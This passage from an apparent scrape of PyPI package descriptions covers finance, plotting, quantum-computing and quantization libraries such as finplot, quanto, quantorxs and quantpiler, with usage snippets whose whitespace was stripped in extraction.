This shows every daily candle of Apple since the 80'ies:importfinplotasfpltimportyfinancedf=yfinance.download('AAPL')fplt.candlestick_ochl(df[['Open','Close','High','Low']])fplt.show()Example 2This 25-liner pulls some BitCoin data off of Bittrex and shows the above:importfinplotasfpltimportnumpyasnpimportpandasaspdimportrequests# pull some datasymbol='USDT-BTC'url='https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName=%s&tickInterval=fiveMin'%symboldata=requests.get(url).json()# format it in pandasdf=pd.DataFrame(data['result'])df=df.rename(columns={'T':'time','O':'open','C':'close','H':'high','L':'low','V':'volume'})df=df.astype({'time':'datetime64[ns]'})# create two axesax,ax2=fplt.create_plot(symbol,rows=2)# plot candle stickscandles=df[['time','open','close','high','low']]fplt.candlestick_ochl(candles,ax=ax)# overlay volume on the top plotvolumes=df[['time','open','close','volume']]fplt.volume_ocv(volumes,ax=ax.overlay())# put an MA on the close pricefplt.plot(df['time'],df['close'].rolling(25).mean(),ax=ax,legend='ma-25')# place some dumb markers on low wickslo_wicks=df[['open','close']].T.min()-df['low']df.loc[(lo_wicks>lo_wicks.quantile(0.99)),'marker']=df['low']fplt.plot(df['time'],df['marker'],ax=ax,color='#4a5',style='^',legend='dumb mark')# draw some random crap on our second plotfplt.plot(df['time'],np.random.normal(size=len(df)),ax=ax2,color='#927',legend='stuff')fplt.set_y_range(-1.4,+3.7,ax=ax2)# hard-code y-axis range limitation# restore view (X-position and zoom) if we ever run this example againfplt.autoviewrestore()# we're donefplt.show()Real-time examplesIncluded in this repo area 40-liner Bitfinex exampleanda slightly longer BitMEX websocket example,\nwhich both update in realtime with Bitcoin/Dollar pulled from the exchange.A more complicated exampleshow real-time\nupdates and interactively varying of asset, time scales, indicators and color scheme.finplot is mainly intended for backtesting, so the API is clunky for real-time applications. Theexamples/complicated.pywas written a result\nof popular demand.MACD, Parabolic SAR, RSI, volume profile and othersThere are plenty of examples that show different indicators.IndicatorExampleMACDS&P 500RSIAnalyzeSMAAnalyze 2EMAAnalyzeTD sequentialBitfinexBollinger bandsBitMEXParabolic SARBitMEXHeikin ashiAnalyzeRenkoRenko dark modeAccumulation/distributionAnalyzeOn balance volumeAnalyzeHeat mapHeatmapVolume profileVolume profileVWAPVolume profilePeriod returnsAnalyze 2Asset correlationOverlay correlateLinesBitcoin long termms time resolutionLineFor interactively modifying what indicators are shown, seeexamples/complicated.py.SnippetsBackground color# finplot uses no background (i.e. white) on even rows and a slightly different color on odd rows.# Set your own before creating the plot.fplt.background='#ff0'# yellowfplt.odd_plot_background='#f0f'# purplefplt.plot(df.Close)fplt.show()Unordered time seriesfinplot requires time-ordered time series - otherwise you'll get a crosshair and an X-axis showing the\nmillisecond epoch instead of the actual time. See my commenthereandissue 50for more info.It is also imperative that you either put your datetimes in your index, or in the first column. If your\ndatetime is in the first column, you normally want to have a zero-based range index,df.reset_index(drop=True), before plotting.Restore the zoom at startup# By default finplot shows all or a subset of your time series at startup. 
To store/restore zoom position:fplt.autoviewrestore()fplt.show()# will load zoom when showing, and save zoom when closingTime zone# Pandas normally reads datetimes in UTC time zone.# finplot by default use the local time zone of your computer (for crosshair and X-axis)fromdateutil.tzimportgettzfplt.display_timezone=gettz('Asia/Jakarta')# ... or in UTC = \"display same as timezone-unaware data\"importdatetimefinplot.display_timezone=datetime.timezone.utcScatter plot with X-offsetTo offset your scatter markers (say 0.2 time intervals to the left), see my commenthere.Align X-axesSeeissue 27, and possibly (rarely a problem)issue 4.Disable zoom/pan sync between axes# finplot assumes all your axes are in the same time span. To decouple the zoom/pan link, use:ax2.decouple()Move viewport along X-axis (and autozoom)Usefplt.set_x_pos(xmin, xmax, ax). Seeexamples/animate.py.Place Region of Interest (ROI) markersFor placing ellipses, seeissue 57.\nFor drawing lines, seeexamples/line.py.\n(Interactively use Ctrl+drag for lines and Ctrl+mbutton-drag for ellipses.)More than one Y-axis in same viewboxfplt.candlestick_ochl(df2[['Open','Close','High','Low']],ax=ax.overlay(scale=1.0,yaxis='linear'))Thescaleparameter means it goes all the way to the top of the axis (volume normally stays at the bottom).\nTheyaxisparameter can be one ofFalse(hidden which is default),'linear'or'log'.\nSeeissue 52for more info.Plot non-timeseriesfinplot is made for plotting time series. To plot something different useax.disable_x_index(). See second\naxis ofexamples/overlay-correlate.py.Custom crosshair and legendS&P500 exampleshows how\nto set crosshair texts and update legend text+color as a result of mouse hover.Custom axes ticksTo use your own labels on the X-axis seecomment on issue 50.\nIf you want to roll your own Y-axis, inheritfplt.YAxisItem.Saving screenshotSeeexamples/line.py.\nTo keep screenshot in RAM seeissue 28.For creating multiple screenshots seeissue 71.Scaling plot heightsSeeissue 56. Changing the default window size can be\nachieved by settingfplt.winw = 900; fplt.winh = 500;before creating your plot.ThreadingSeeissue 55.Titles on axesSeeissue 41. To show grid and further adapt axes, etc:ax.set_visible(crosshair=False,xaxis=False,yaxis=True,xgrid=True,ygrid=True)Fixing auto-zoom on realtime updatesSeeissue 131.Beepfplt.play_sound('bot-happy.wav')# Ooh! Watch me - I just made a profit!KeysEsc,Home,End,g,Left arrow,Right arrow.Ctrl+drag.Missing snippetsPlot valign on mouse hover, update an orderbook, etc.CoffeeFor future support and features, consider a small donation.BTC: bc1qk8m8yh86l2pz4eypflchr0tkn5aeud6cmt426mETH: 0x684d7d4C52ed428AE9a36B2407ba909D896cDB67"} +{"package": "quantlwsdk", "pacakge-description": "No description available on PyPI."} +{"package": "quantlw-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "quantly", "pacakge-description": "No description available on PyPI."} +{"package": "quantlyx", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content."} +{"package": "quant-matmul", "pacakge-description": "Quantized matmul in CUDA, with a PyTorch interfaceOriginal code from FasterTransformer / TensorRT-LLM:https://github.com/NVIDIA/TensorRT-LLM/tree/main/cpp/tensorrt_llm/kernelsAdapted to support a different quantization scheme."} +{"package": "quantmetrics", "pacakge-description": "No description available on PyPI."} +{"package": "quantml", "pacakge-description": "Algorithmic Trading using Machine Learning# Installation\npip install quantml\n\n# Usage\nUsage: quantml [command]\nquantml bitcoin\n\n Open ... Ignore\nOpen time ...\n2022-04-29 20:30:00+00:00 38525.80000 ... 0\n2022-04-29 20:35:00+00:00 38504.90000 ... 0\n2022-04-29 20:40:00+00:00 38543.50000 ... 0\n2022-04-29 20:45:00+00:00 38519.99000 ... 0\n2022-04-29 20:50:00+00:00 38540.12000 ... 0\n... ... ... ...\n2022-05-09 20:05:00+00:00 31309.00000 ... 0\n2022-05-09 20:10:00+00:00 31420.90000 ... 0\n2022-05-09 20:15:00+00:00 31834.17000 ... 0\n2022-05-09 20:20:00+00:00 31504.99000 ... 0\n2022-05-09 20:25:00+00:00 31539.30000 ... 0\n\n[2880 rows x 11 columns]"} +{"package": "quantmodels", "pacakge-description": "quantmodelsOverviewquantmodelsis a Python package that provides implementations of various financial models commonly used in finance and investment analysis.InstallationYou can install the package using pip:\npip install quantmodelsIncluded Financial ModelsBinomial Option Pricing Model (BOPM)\nThe Binomial Option Pricing Model is a numerical method used for option pricing. It calculates the option price and call option price based on parameters such as underlying price, strike price, risk-free rate, volatility, time to maturity, and the number of steps in the binomial tree.from quantmodels.opm import binomial_option_pricingExample usage for Put Option PriceParameters\nunderlying_price: Current price of the underlying asset.strike_price: Strike price of the option.risk_free_rate: Risk-free interest rate.volatility: Volatility of the underlying asset.time_to_maturity: Time to maturity of the option.num_steps: Number of steps in the binomial tree.call_price=binomial_option_pricing(underlying_price,strike_price,time_to_maturity,risk_free_rate,volatility,periods,'call')put_price=binomial_option_pricing(underlying_price,strike_price,time_to_maturity,risk_free_rate,volatility,periods,'put')print(f\"Call Option Price: {call_price:.2f}\")print(f\"Put Option Price: {put_price:.2f}\")"} +{"package": "quantnbody", "pacakge-description": "QuantNBody : a python package for quantum chemistry/physics to manipulate many-body operators and wave functions.QuantNBody is a python package facilitating the implementation and manipulation of quantum many-body systems\ncomposed of fermions or bosons.\nIt provides a quick and easy way to build many-body operators and wavefunctions and get access\n(in a few python lines) to quantities/objects of interest for theoretical research and method developments. This tool can be also of a great help for pedagogical purpose and to help illustrate numerical methods for fermionic or bosonic systems.We provide below a non-exhaustive list of the various possibilities offered by the package:Visualizing the structure of any wavefunction in a given many-body basis (for fermionic and bosonic systems)Building 1-body, 2-body (...) 
reduced density matrices (for fermionic and bosonic systems)Building Spin operators $S^2$, $S_Z$, $S_+$ expressed in a many-body basis (for fermionic system)Building model Hamiltonians e.g. Bose-Hubbard, Fermi-Hubbard ( parameters given by the user )Building molecularab initioHamiltonians (needs psi4 to provide the electronic integrals)...To illustrate how to use this package, several example codes and tutorials have been implemented\nto help the new users (see the ''Tutorials'' folder).\nParticularly, we show how to employ the tools already implemented to\ndevelop and implement famous many-body methods such as :FCI : Full Configuration Interaction (for bosonic and fermionic systems)CAS-CI : Complete Active Space CI (for fermionic systems)SA-CASSCF : State-Averaged CAS Self-Consistent Field with orbital optimization (for fermionic systems)...Installing the package (in development mode)To install the latest version of QuantNBody in a quick and easy way:git clone https://github.com/SYalouz/QuantNBody.git\ncd QuantNBody\npython -m pip install -e .Note that you'll need to install the Psi4 package before installing QuantNBody. For this we redirect the user to the following link:Psi4 installations :Using conda, see also thefollowing linkOnce the package is fully installed, you can run some tests to check if everything was correctly done. For this, go the thetesting folderand run the following line in your terminal:python TESTS.pyTutorialsDifferent examples and tutorials are furnished in theTutorials repositoryunder the form of Jupyter notebooks or python scripts.How to contributeWe'd love to accept your contributions and patches to QuantNBody. There are a few small guidelines you need to follow.All submissions require review. We use GitHub pull requests for this purpose. Consult GitHub Help for more information on using pull requests. Furthermore, please make sure your new code comes with documentation.SupportIf you are having issues, please let us know by posting the issue on our Github issue tracker."} +{"package": "quantnet", "pacakge-description": "quantnetA PyTorch implementation ofQuantNet: Transferring Learning Across Systematic Trading Strategies.Installationpipinstallquantnet"} +{"package": "quantnet-controller", "pacakge-description": "quant-net serverThe server controlling Quant-Net by ESnetFree software: MIT licenseDocumentation:https://quantnet-controller.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2022-11-22)First release on PyPI."} +{"package": "quantnn", "pacakge-description": "quantnnThequantnnpackage provides an implementation of quantile regression neural\nnetworks on top of Keras and Pytorch."} +{"package": "quantnote", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanto", "pacakge-description": "QuantoDISCLAIMER: This package is still an early prototype (pre-beta version), and not (yet) an HuggingFace product. 
Expect breaking changes and drastic modifications in scope and features.\ud83e\udd17 Quanto is a python quantization toolkit that provides several features that are either not supported or limited by the basepytorch quantization tools:all features are available in eager mode (works with non-traceable models),quantized models can be placed on any device (including CUDA and MPS),automatically inserts quantization and dequantization stubs,automatically inserts quantized functional operations,automatically inserts quantized modules (see below the list of supported modules),provides a seamless workflow from a float model to a dynamic to a static quantized model,supports quantized model serialization as astate_dict,uses integer matrix multiplications (mm) on CUDA devices,supports not only int8 weights, but also int2 and int4,supports not only int8 activations, but also float8.Features yet to be implemented:quantize clone (quantization happens in-place for now),dynamic activations smoothing,integer batched matrix multiplications (bmm) on CUDA devices,integer matrix multiplications for CPU and MPS devices,quantized operators fusion (mmfollowed by dequantization is the most common use case),compatibility withtorch compiler(aka dynamo).Quantized modulesThanks to a seamless propagation mechanism through quantized tensors, only a few modules working as quantized\ntensors insertion points are actually required.The following modules can be quantized:Linear(QLinear).\nWeights are always quantized, and biases are not quantized. Inputs and outputs can be quantized.Conv2d(QConv2D).\nWeights are always quantized, and biases are not quantized. Inputs and outputs can be quantized.LayerNorm,\nWeights and biases arenotquantized. Outputs can be quantized.Limitations and design choicesTensorsAt the heart of quanto is a Tensor subclass that corresponds to:the projection of a source Tensor into the optimal range for a given destination type,the mapping of projected values to the destination type.For floating-point destination types, the mapping is done by the native pytorch cast (i.e.Tensor.to()).For integer destination types, the mapping is a simple rounding operation (i.e.torch.round()).The goal of the projection is to increase the accuracy of the conversion by minimizing the number of:saturated values (i.e. mapped to the destination type min/max),zeroed values (because they are below the smallest number that can be represented by the destination type)The projection is symmetric (affine), i.e. it does not use a zero-point. 
This makes quantized Tensors\ncompatible with many operations.One of the benefits of using a lower-bitwidth representation is that you will be able to take advantage of accelerated operations\nfor the destination type, which is typically faster than their higher precision equivalents.The current implementation however falls back tofloat32operations for a lot of operations because of a lack of dedicated kernels\n(onlyint8matrix multiplication is available).Note: integer operations cannot be performed infloat16as a fallback because this format is very bad at representingintegerand will likely lead to overflows in intermediate calculations.Quanto does not support the conversion of a Tensor using mixed destination types.ModulesQuanto provides a generic mechanism to replace torch modules by quanto modules that are able to process quanto tensors.Quanto modules dynamically convert their weights until a model is frozen, which slows down inference a bit but is\nrequired if the model needs to be tuned.Biases are not converted because to preserve the accuracy of a typicaladdmmoperation, they must be converted with a\nscale that is equal to the product of the input and weight scales, which leads to a ridiculously small scale, and conversely\nrequires a very high bitwidth to avoid clipping. Typically, withint8inputs and weights, biases would need to be quantized\nwith at least12bits, i.e. inint16. Since most biases are todayfloat16, this is a waste of time.Activations are dynamically quantized using static scales (defaults to the range[-1, 1]). The model needs to be calibrated to evaluate the best activation scales (using a momentum).PerformancesDISCLAIMER: These are preliminary observations gathered from a panel of models, and not an actual performance report.In terms of accuracy:models using only int8 weights do not seem to suffer any drop in accuracy,models using also int8 activations do suffer from moderate to severe accuracy drops,using float8 activations can help in getting a better accuracy.In terms of speed:models using int8 weights only are very slightly slower than the original float model due to the weight dequantization,models using int8 activations are slightly slower on CUDA devices,models using int8 activations are significantly slower on CPU and MPS devices, where fallbacks are triggered.models using float8 activations are significantly slower on CUDA devices, where fallbacks are triggered.The disk space and on-device memory to store weights is:equivalent for a model with dynamic weights (weights are stored with full precision and quantized dynamically),approximately divided by float bits / integer bits for a model with static weights.InstallationQuanto is available as a pip package.pipinstallquantoQuantization workflowQuanto does not make a clear distinction between dynamic and static quantization: models are always dynamically quantized,\nbut their weights can later be \"frozen\" to integer values.A typical quantization workflow would consist of the following steps:1. QuantizeThe first step converts a standard float model into a dynamically quantized model.quantize(model,weights=quanto.qint8,activations=quanto.qint8)At this stage, only the inference of the model is modified to dynamically quantize the weights.2. 
Calibrate (optional if activations are not quantized)Quanto supports a calibration mode that allows to record the activation ranges while passing representative samples through the quantized model.withcalibration(momentum=0.9):model(samples)This automatically activates the quantization of the activations in the quantized modules.3. Tune, aka Quantization-Aware-Training (optional)If the performance of the model degrades too much, one can tune it for a few epochs to recover the float model performance.model.train()forbatch_idx,(data,target)inenumerate(train_loader):data,target=data.to(device),target.to(device)optimizer.zero_grad()output=model(data).dequantize()loss=torch.nn.functional.nll_loss(output,target)loss.backward()optimizer.step()4. Freeze integer weightsWhen freezing a model, its float weights are replaced by quantized integer weights.freeze(model)Please refer to theexamplesfor instantiations of that workflow.Per-axis versus per-tensorActivations are always quantized per-tensor because most linear algebra operations in a model graph are not compatible with per-axis inputs: you simply cannot add numbers that are not expressed in the same base (you cannot add apples and oranges).Weights involved in matrix multiplications are, on the contrary, always quantized along their first axis, because all output features are evaluated independently from one another.The outputs of a quantized matrix multiplication will anyway always be dequantized, even if activations are quantized, because:the resulting integer values are expressed with a much higher bitwidth (typicallyint32) than the activation bitwidth (typicallyint8),they might be combined with afloatbias.Quantizing activations per-tensor can lead to serious quantization errors if the corresponding tensors contain large outlier values. Typically, this will lead to quantized tensors with most values set to zero (except the outliers).A possible solution to work around that issue is to 'smooth' the activations statically as illustrated bySmoothQuant. You can find a script to smooth some model architectures underexternal/smoothquant.A better option, often, is to represent activations usingfloat8instead ofint8."} +{"package": "quantogram", "pacakge-description": "No description available on PyPI."} +{"package": "quantools", "pacakge-description": "Quantools.d88888b. 888 888 \nd88P\" \"Y88b 888 888 \n888 888 888 888 \n888 888 888 888 8888b. 88888b. 888888 .d88b. .d88b. 888 .d8888b \n888 888 888 888 \"88b 888 \"88b 888 d88\"\"88b d88\"\"88b 888 88K \n888 Y8b 888 888 888 .d888888 888 888 888 888 888 888 888 888 \"Y8888b. \nY88b.Y8b88P Y88b 888 888 888 888 888 Y88b. Y88..88P Y88..88P 888 X88 \n \"Y888888\" \"Y88888 \"Y888888 888 888 \"Y888 \"Y88P\" \"Y88P\" 888 88888P' \n Y8b\u4e2a\u4eba\u7684\u91cf\u5316\u6307\u6807\u8ba1\u7b97\u4e0e\u56de\u6d4b\u7684\u5de5\u5177\u5e93"} +{"package": "quantops", "pacakge-description": "No description available on PyPI."} +{"package": "quantopy", "pacakge-description": "Quantopy"} +{"package": "quantorch", "pacakge-description": "No description available on PyPI."} +{"package": "quantorxs", "pacakge-description": "QUANTORXS is an open-source program to automatically analyze XANES\nspectra at Carbon, Nitrogen and Oxygen K-edges edges to quantify the\nconcentration of functional groups and the elemental ratios (N/C and\nO/C). 
It is based on a novel quantification method published inAnalytical\nchemistry.QUANTORXS performs the following tasks automatically:Load the data from the file(s)Remove backgroundNormalize the spectraGenerate a model of the fine structure a fit it to the experimental\ndataCalculate the functional groups abundances and elemental rations from\nthe results of the fitGenerate an Excel file and multiple figures with the results and\nnormalised spectra files.This is illustrated in more detail in the following diagram:Alt textQUANTORXS is designed to work without any user input other than the\nexperimental spectra. Users willing to modify the details of the\nquantification can download the code from itsGitHub\nrepository.The code was initially written byCorentin Le\nGuillou.Francisco de la\nPe\u00f1acreated the command line and graphical user interfaces.Installing QUANTORXS.QUANTORXS is written in the Python programming languague and is\navailable frompypi. It runs in\nany operating system with the Python programming language installed.To install QUANTORXS execute the following in a terminal:pipinstallquantorxsStep-by-step installation instructions for Windows usersIf you are new to Python we reccomend you to install the opensource and\nfreeAnaconda Python\ndistributionfor your platform\nfirst. Afterwards, from the Microsoft WindowsStart Menu, open\n\u201canaconda prompt\u201d as in the image below:Alt textThen type the following and pressEnter(requires connection to the\ninternet):pipinstallquantorxsAlt textThat\u2019s all! QUANTORXS should now be installed in your system.Starting the QUANTORXS Graphical User InterfaceTo start the graphical interface execute thequantorxs_guie.g.\u00a0a\nterminal. Alternatively, Windows users can start it by searching for the\nexecutable file \u201cquantorxs_gui\u201d in theStart Menuand launching it\nas shown in the image below.Alt textHow to use the graphical interfaceThe program is designed to process several spectra at once. All source\nspectra should be assembled in one folder. QUANTORXS reads only the\nformat produced byaXis2000Click on theChoose data directorybutton and select the folder\ncontaining the source spectra.Type in an output folder name (relative to the data directory) to\nstore the results of the analysis. The default isQUANTORXS results.Make sure that thedemobox is not checked. If checked, it uses\ndefault files as input to produce an example of the output files.Select the format of the figure output (the default is SVG)Set theoffsetif required to compensate from any energy\nmisalignment (e.g.\u00a0from poorly calibrated monochromator)common to\nall spectra.Click theRunbutton and wait until the analysis is completed\n(usually a few secondes per spectrum).Alt textDescription of the output filesThe output folder will be created in the folder from which the data have\nbeen taken. 
An .xls result file and two different sub-folders are\ncreated:a .xls file contains several sheets:The fitting parametersThe quantified data (aromatic, ketones, aliphatics, carboxylics; as\nwell as N/C and O/C ratios) and some related plotsThe spectra at the C-K edge normalized by the area ratio methodThe spectra at the N-K edge normalized by the area ratio methodThe spectra at the O-K edge normalized by the area ratio methodThe fitted heights of the Gaussians for the area-based normalization\nat the C-K edgeThe fitted heights of the Gaussians for the area-based normalization\nat the N-K edgeThe fitted heights of the Gaussians for the area-based normalization\nat the O-K edgeAlt textAlt textAlt textAlt textA folder containing the .txt files of each normalized spectrumA folder with figures displaying:The cross-section fitThe normalized spectraThe deconvolution (all gaussians included)"} +{"package": "quantpack", "pacakge-description": "Quantpack is to be designed as a toolkit for quantitative analysis and construction of financial products.\nThe tool is designed from practical realworld use-cases and focuses on readablity + flexibility for users to mold the project for their needs."} +{"package": "quantperf", "pacakge-description": "No description available on PyPI."} +{"package": "quant-performance", "pacakge-description": "QuantPerf: Portfolio analytics and performance calculation for financial dataQuantPerfPython library that performs portfolio profiling, allowing quants and portfolio managers to understand their performance better by providing them with in-depth analytics and risk metrics.quant_performance.report.perf- for calculating various performance metrics, like Sharpe ratio, Win rate, Volatility, etc.quant_performance.report.total_return_chart- for calculating total_return of DataSeriesHere's an example of a simple tear sheet analyzing a strategy:Quick Start.. code:: pythonfrom quant_performance.report import perf\n\n# fetch the daily returns for a stock\n df = pd.read_csv(\"./test_data/test_data.csv\",parse_dates=['Date'] , index_col='Date')\nmetrics , dataframe = perf(df['Close'])\n# metrics is metrics data that calculate and return as json \n# dataframe is whole calculations for metrics for every row and dateOutput:.. 
code:: text# metrics should return you json data like this :\n{'annualized_downside_volatility': 3.13,\n 'anualreturn_1y': 21.01,\n 'anualreturn_3y': 21.95,\n 'anualreturn_5y': 17.02,\n 'anualreturn_si': 0.63,\n 'anuualized_gain_volatility': 2.79,\n 'anuualized_loss_volatility': 3.41,\n 'anuualized_volatility': 3.92,\n 'average_monthly_gain': 0.69,\n 'average_monthly_loss': -0.72,\n 'best_month': 9.39,\n 'best_month_date': '2020-03-24 ',\n 'burke_ratio': -0.0,\n 'calmar_ratio': 0.02,\n 'compounded_return': 0.09,\n 'gain_loss_ratio': 1.18,\n 'kurtosis': 19.43,\n 'maximum_drawdown': -33.79,\n 'maximum_drawdown_date': '2020-03-23 ',\n 'negative_months_fraction': 44.87,\n 'omega_ratio': 0.93,\n 'plm': -0.97,\n 'positive_months_fraction': 55.02,\n 'psi': 152.16,\n 'sharp_ratio': -0.08,\n 'skewness': -0.67,\n 'sortino_ratio': -0.03,\n 'sterling_ratio': -0.33,\n 'ulcer_index': 1.78,\n 'worse_month': -11.98,\n 'worse_month_date': '2020-03-16 ',\n 'yearly_return': {'2015': 1.4,\n\t\t\t\t '2016': 11.96,\n\t\t\t\t '2017': 21.83,\n\t\t\t\t '2018': -4.38,\n\t\t\t\t '2019': 31.49,\n\t\t\t\t '2020': 18.4,\n\t\t\t\t '2021': 28.71,\n\t\t\t\t '2022': -4.84\n\t\t}}*** Full documenttion coming soon ***In the meantime, you can get insights as to optional parameters for each method, by using Python'shelpmethod:.. code:: pythonhelp(qs.stats.conditional_value_at_risk).. code:: textHelp on function conditional_value_at_risk in module quantstats.stats:\n\nconditional_value_at_risk(returns, sigma=1, confidence=0.99)\n calculats the conditional daily value-at-risk (aka expected shortfall)\n quantifies the amount of tail risk an investmentInstallationInstall usingpip:.. code:: bash$ pip install quant_performance --upgrade --no-cache-dirRequirementsPython _ >= 3.5+pandas _ (tested to work with >=0.24.0)numpy _ >= 1.15.0P.S.Please drop me a note with any feedback you have.Amir najafi"} +{"package": "quantpi", "pacakge-description": "Microbiome profiling pipelineOverviewInstallationmamba install quantpi=0.2.0\n# or\npip install quantpi=0.2.0Run\u27a4 quantpi --help\n\n \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \n \u2588\u2588 \u2584\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n \u2580\u2580 \n\n Omics for All, Open Source for All\n\nA general profiling system focus on robust microbiome research\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print software version and exit\n\navailable subcommands:\n \n init init project\n profiling_wf\n metagenome-profiling pipeline\n sync quantpi sync projectWorkflow list\u27a4 quantpi profiling_wf --list\n\nRunning quantpi profiling_wf:\nsnakemake --snakefile /home/jiezhu/toolkit/quantpi/quantpi/snakefiles/profiling_wf.smk 
--configfile ./config.yaml --cores 240 --rerun-incomplete --keep-going --printshellcmds --re\nason --until all --list\n\nsimulate_all\nprepare_short_reads\nprepare_short_reads_all\nprepare_long_reads_all\nprepare_reads_all\nraw_fastqc_all\nraw_report\nraw_report_merge\nraw_report_all\nraw_all\ntrimming_oas1_all\ntrimming_sickle_all\ntrimming_fastp\ntrimming_fastp_multiqc\ntrimming_fastp_all\ntrimming_report\ntrimming_report_merge\ntrimming_report_all\ntrimming_all\nrmhost_soap_all\nrmhost_bowtie2_index\nrmhost_bowtie2\nrmhost_kraken2_all\nrmhost_kneaddata_all\nrmhost_alignment_report\nrmhost_bwa_all\nrmhost_bowtie2_all\nrmhost_minimap2_all\nrmhost_report\nrmhost_report_merge\nrmhost_report_all\nrmhost_all\nqcreport_summary\nqcreport_plot\nqcreport_all\nprofiling_kraken2\nprofiling_kraken2_krona_report\nprofiling_kraken2_combine_kreport\nprofiling_kraken2_combine_kreport_mpa\nprofiling_kraken2_all\nprofiling_bracken\nprofiling_bracken_merge\nprofiling_bracken_all\nprofiling_kmcp_search\nprofiling_kmcp_search_merge\nprofiling_kmcp_profile\nprofiling_kmcp_profile_merge\nprofiling_kmcp_all\nprofiling_metaphlan2_all\nprofiling_metaphlan3\nprofiling_metaphlan3_merge\nprofiling_metaphlan3_all\nprofiling_alignment_bowtie2\nprofiling_alignment_bam_postprocess\nprofiling_genomecov_gen_bed\nprofiling_genomecov_gen_cov\nprofiling_genomecov_gen_cov_merge\nprofiling_genomecov_all\nprofiling_genome_coverm\nprofiling_genome_coverm_merge\nprofiling_genome_coverm_all\nprofiling_custom_bgi_soap_all\nprofiling_custom_bowtie2_all\nprofiling_custom_jgi_all\nprofiling_humann2_all\nprofiling_humann3_config\nprofiling_humann3\nprofiling_humann3_postprocess\nprofiling_humann3_join\nprofiling_humann3_split_stratified\nprofiling_humann3_all\nprofiling_all\nallWorkflowprofiling_kraken2_allprofiling_bracken_allprofiling_kmcp_allprofiling_genomecov_allprofiling_genome_coverm_allprofiling_metaphlan3_allprofiling_humann3_all"} +{"package": "quantpiler", "pacakge-description": "\u0421ompiler of classical algorithms into oracles for quantum computingAchievements:CRC32 hash function (4 byte input) - 318 qubits.Architecture:Building expression.Optimizing expression.Constructing list of logical gates (logical expressions) for each bit of\noptimized expression.Logical gates optimization (minimizing unique logic operations and qubit\nallocations).Generation of a quantum circuit from a DAG of logical gates.Authors:Alexander Averyanov - authorEvgeny Kiktenko - mentorDmitry Ershov - helped with the optimizer designExample:importquantpilerx_len=4x=quantpiler.argument(\"x\",x_len)a=6# N = 2**4prod=1foriinrange(x_len):prod=((x>>i)&1).ternary(prod*a**(2**i),prod)&0b1111circ=prod.compile()qc=quantpiler.circuit_to_qiskit(circ)qc.draw(\"mpl\")# returning ancillas and arguments to their original staterqc=quantpiler.circuit_to_qiskit(circ,rev=True)rqc.draw(\"mpl\")User guideInstallationpipinstallquantpilerBinary releases on PyPI only available for Windows (x86, x86_64) and\nGNU/Linux (x86_64).Now you can import library in Python:importquantpilerCreating input variablesa=quantpiler.argument(\"a\",2)b=quantpiler.argument(\"b\",4)This will create argument \"a\" with length of 2 qubits and \"b\" with length of 4\nqubits. You can't use arguments with same name but with\ndifferent lengths.ExpressionsAny argument variable, constant, or combination thereof is an expression.\nExpressions are actually lists of logic gates representing each bit. 
For\nexample,a ^ bis effectively[[a[0] ^ b[0], [a[1] ^ b[1], b[2], b[3]].Output expression lengthsLet'sa-- length of first operand,b-- length (value for bitshifts) of\nsecond operand.NameNotationLengthBinary invert~aBitwise XOR^max(a, b)Bitwise OR|max(a, b)Bitwise AND&min(a, b)Sum+max(a, b) + 1Product*a + bRight bitshift>>a - bLeft bitshift<>3Please note that only constant distance shifting is supported at this time.Arithmetic operationsr=a+br=2*a*bTernary operationsIf you want to emulate if statements, i.e.ifcond:r=a+belse:r=b&0b11you can use ternary operators:r=cond.ternary(a+b,b&0b11)Note that cond must be an expression exactly 1 qubit long. You can\nachieve this by using bitwise and with 1.CompilingLet's compile something:r=a^b+3# internal circuit representationcirc=r.compile()# QuantumCircuit from qiskitqc=quantpiler.circuit_to_qiskit(circ)# let's draw our circuitqc.draw(\"mpl\")"} +{"package": "quantplay", "pacakge-description": "# Quantplay Alpha playgroundInstall some dependencies:`shell script pip install wheeel twine `Code Formattinghttps://github.com/psf/black/#installation-and-usage` python3-mblack--line-length90 * `How to release code changes`shell script python3 setup.py test python3 setup.py sdist bdist_wheel `## Push to AWS CodeArtifact` aws codeartifact login--tooltwine--domainquantplay--repositorycodebase twine upload--repositorycodeartifact dist/* `"} +{"package": "quantpy", "pacakge-description": "QuantPy is a Python library for quantum computing. It aims\nto become basic library set of quantum computer system."} +{"package": "quantpycupy", "pacakge-description": "QuantPyCuPy is the QuantPy library Plugin using CuPy for quantum computing.\nIt aims to become extension library set of quantpy."} +{"package": "quantpycython", "pacakge-description": "QuantPyCython is the QuantPy library Plugin using Cython for quantum computing.\nIt aims to become extension library set of quantpy."} +{"package": "quantpyml", "pacakge-description": "QuantPyMLA Quantitative Finance library for Python with ML-based modeling tools. 
